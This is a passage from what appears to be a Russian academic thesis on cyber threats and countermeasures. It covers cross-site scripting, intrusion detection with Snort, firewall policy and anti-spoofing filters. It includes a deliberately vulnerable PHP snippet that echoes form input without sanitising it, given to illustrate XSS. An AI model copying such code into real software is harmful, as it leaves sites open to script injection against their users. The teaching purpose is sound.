Таким образом, в случаях, когда в шапке (header) сайта присутствует имя пользователя, то данный код может быть активирован, а при наличии определенных обстоятельств посредством такого кода можно сделать практически все, что угодно, поскольку угроза атаки становится вполне реальной, а сами разработчики, в свою очередь, не всегда уделяют данному вопросу достаточно внимания.

Отметим, что подобного рода атакам подвергалась такая известная в России сеть как «ВКонтакте», поскольку, как известно, в ее базах также содержатся личные данные пользователей.

Пример атаки такого рода можно привести, рассмотрев следующий PHP-код:

$firstname = $_POST["firstname"];

echo "Your name: $firstname".

После ввода имени в веб-форме сайт отображает на странице соответствующее сообщение. Если указать в форме имя "Vasilii", то сообщение будет иметь следующий вид: "Your name: Vasilii".

Если вместо имени будет введен участок кода, который преследует определенную цель, он будет выполнен, а цель достигнута с большей долей вероятности.

Далее, на рисунке 11 будет наглядно представлена схема реализации атак по принципу и типу межсайтингового скриптинга.

Рисунок 11 - Реализация атаки по типу межсайтингового скриптинга



Выводы по первой главе

Таким образом, в результате анализа существующих сегодня киберугроз мы выяснили, что, условно, по критерию объекта воздействия они могут быть разделены на угрозы, которые представляют физическую опасность для:

- Вычислительной техники и её составных частей;

- Телекоммуникационной структуры, которая, собственно, и обслуживает вычислительную технику;

- Специального программного обеспечения или операционных систем, установленных на компьютерном оборудовании);

- Структуры веб-сайтов, которые физически расположены на веб-серверах. Вместе с тем, среди наиболее распространенных киберугроз являются:

- Перехват сетевых данных;

- Атаки методом подмены IP-адреса, или, так называемый, IP-спуфинг;

- Атаки с помощью подбора паролей;

- Атаки методом вызова отказа в обслуживании, или DoS/DDoS атаки.

Далее, считаем целесообразным изучить существующие методы противодействия киберугрозам.



2. Анализ методов противодействия киберугрозам

2.1 Методы противодействия угрозам воздействия на телекоммуникационную структуру

2.1.1 Обнаружение факта анализа трафика

В рамках исследования атак был отмечен момент, не являющийся атакой, но имеющий достаточно емкую подготовительную роль для ее осуществления. Этим инструментом является анализ трафика. Существует определенное количество механизмов, способных обнаружить действия такого характера. Этот механизм реализован в системах обнаружения атак.

Отметим, что именно возможность собирать и анализировать значительно больший объем информации является главным преимуществом использования систем обнаружения атак, поскольку данный метод дает возможность обнаружить большинство известных сегодня атак.

Однако, среди недостатков данного механизма можно выделить наименьшую вероятность обеспечения защиты всех компонентов.

Безусловно, посредством константного сбора информации с нескольких узлов нагружает сеть, что, безусловно, может вызвать потенциальную перегрузку, поскольку пропускная способность сервера будет превышена.

Более того, когда производится постоянный обмен информацией, то это, фактически, означает, что одновременно открыто сразу несколько портов, а это значит, что шансы злоумышленников проникнуть в систему значительно повышаются.

Также, нельзя не забывать и о том, что, в саму информационную систему может быть внедрено вредоносное программное обеспечение, блокирующее работу агента или пытающееся подделать всю информацию, которая им передается.

Надо сказать, что данные особенности, в первую очередь обуславливают основную задачу, которая возникает в процессе реализации распределенных систем обнаружения атак, а именно - выбор идеологии процедуры принятия решений и, в этом смысле, существует нескольку вариантов таких процедур, которые отличаются степенью централизации.

Один из таких вариантов - сбор данных и их передача центральному узлу системы обнаружения атак, иными словами, передача информации в специальный модуль, который отвечает за принятие решений. Отметим, что данный вариант является наиболее простым.

В данном случае, сам модуль призван анализировать всю информацию, которая поступает, а затем он должен вынести решение и заключение о произведенном факте атаки, что характеризуется большим объемом передаваемых по сети данных и, очевидно, повышает вероятность обнаружения факта работы системы обнаружения атак злоумышленником, делая всю систему уязвимой к атакам на отказ в обслуживании.

Вторым вариантом является многоступенчатый подход к принятию решений, который заключается в том, что выделяются промежуточные модули принятия решения, которые собирают данные только с ограниченного числа агентов и передают на верхний уровень гораздо меньший объем информации, дополненный промежуточным решением.

Надо отметить, что использование любого из представленных вариантов приведет к тому, что процедура принятия решения будет осуществлена [18].

Рассмотрим системы обнаружения таких атак. Одной из наиболее известных является бесплатная система обнаружения атак с открытым исходным кодом, разработанная Мартином Рошем (Martin Roesch) под названием СОА Snort.

Сама система поставляется в различных версиях и может использоваться в рамках таких операционных систем как Mac OS X, Windows NT, BSD или Linux.

По сути, речь идет о сетевой системе, которая основана на методе сигнатурного анализа.

Фактически, принцип ее действия может быть описан таким образом, что сама сигнатура атаки может быть описана с помощью обычных синтаксических конструкций, которые позволяют выявлять интересующую администратора информацию в полях заголовков и содержимом передаваемых по сети пакетов, а сами данные, которые могут быть получены в результате выполнения правила представлены на Рисунке 12.

Рисунок 12 - Результат обнаружения СОА Snort входящих Echo - запросов

Помимо прочего, система Snort представляет собой совокупность нескольких препроцессоров, которые выполняют очень сложные операции в части анализа трафика. Речь идет о процедурах дефрагментации IP-пакетов, об отслеживании TCP-соединений, а также о выявлении возможных попыток мошенников отсканировать существующие открытые порты.

Отметим, что за счет программного модуля, который встроен в ПО Snort можно отслеживать факты сканирования таких портов посредством специального алгоритма, который базируется на том, что при сканировании портов существенно увеличивается количество исходящих TCP-пакетов с установленным флагом RST.

Активирование данного флага на отправляемом в ответ пакете, фактически, значит, что порт, к которому производилось обращение, является закрытым и, таким образом, в процессе анализа количества пакетов с установленным флагом RST, можно выявлять факты сканирования портов системы.

Данная система обладает весьма гибким механизмом настроек, поэтому в результате их правильного выполнения можно построить достаточно эффективную систему обнаружения атак на веб-сервер, что позволит противодействовать им.

2.1.2 Политика межсетевого экранирования

Для защиты и обеспечения оптимальной работы телекоммуникационной структуры вычислительных систем, которые могут стать объектом атаки, возможно применить комплексную систему информационной безопасности, позволяющую использовать достоинства межсетевых экранов наиболее эффективно.

Помимо прочего, она позволяет компенсировать все недостатки с помощью иных средств безопасности, а полнофункциональная защита корпоративной сети призвана обеспечивать:

- безопасность взаимодействия каждого пользователя информационных ресурсов с внешней сетью, в том числе и с Интернетом;

- предоставление технологически единого комплекса мер, позволяющего обеспечивать защиту для распределенных и сегментированных локальных сетей установленных в каждом структурном подразделении современных предприятий;

- иерархической системой защиты, которая может обеспечивать наиболее адекватными средствами, которые предоставляют безопасность различным сегментам корпоративных сетей, независимо от их степени закрытости.

Вместе с тем, в корпоративных системах Интернет и Интранет сам характер современной обработки данных требует наличия у межсетевых экранов таких основных качеств, как:

- мобильности и масштабируемости аппаратно-программной платформы;

- возможности быть интегрированными в аппаратно-программные средства, поставляемые другими производителями;

- обладать простотой установки, и быть практичными при конфигурировании и эксплуатации;

- возможностью быть управляемыми в соответствии с действующей централизованной политикой безопасности.

В итоге можно сделать вывод, что межсетевое экранирование является гибким и эффективным инструментом, который может быть применен в зависимости от необходимой модели защиты исходя из соображений целесообразности.

2.1.3 Защита от спуфинга

Множество сетевых атак на вычислительные системы проводятся с подмененными IP-адресами источника атаки, что снижает риск для атакующего быть замеченным.

Система защиты от спуфинга (anti-spoofing) должна быть использована на каждой точке, где существует возможность подобной атаки, обычно устанавливается данная защита на границах сети, между большими блоками адресов или между доменами сетевого администрирования.

Такая защита реализуется в том числе с помощью листов контроля доступа. К сожалению, нет общих примеров по конфигурации таких конструкций на межсетевом экране, каждый раз подход к их синтаксису различный.

Но принцип действия один: отбросить пакет, который пришел с интерфейса, с которого данный пакет прийти не может. Например, система имеет два интерфейса, один из них смотрит в сеть Интернет, а другой в сеть Интранет.

Все пакеты, принятые из сети Интернет с адресами источника внутренней сети (адреса Интранет), будут отброшены. Если ресурсы аппаратной части позволяют, то анти-спуффинг должен быть включен на каждом интерфейсе.

...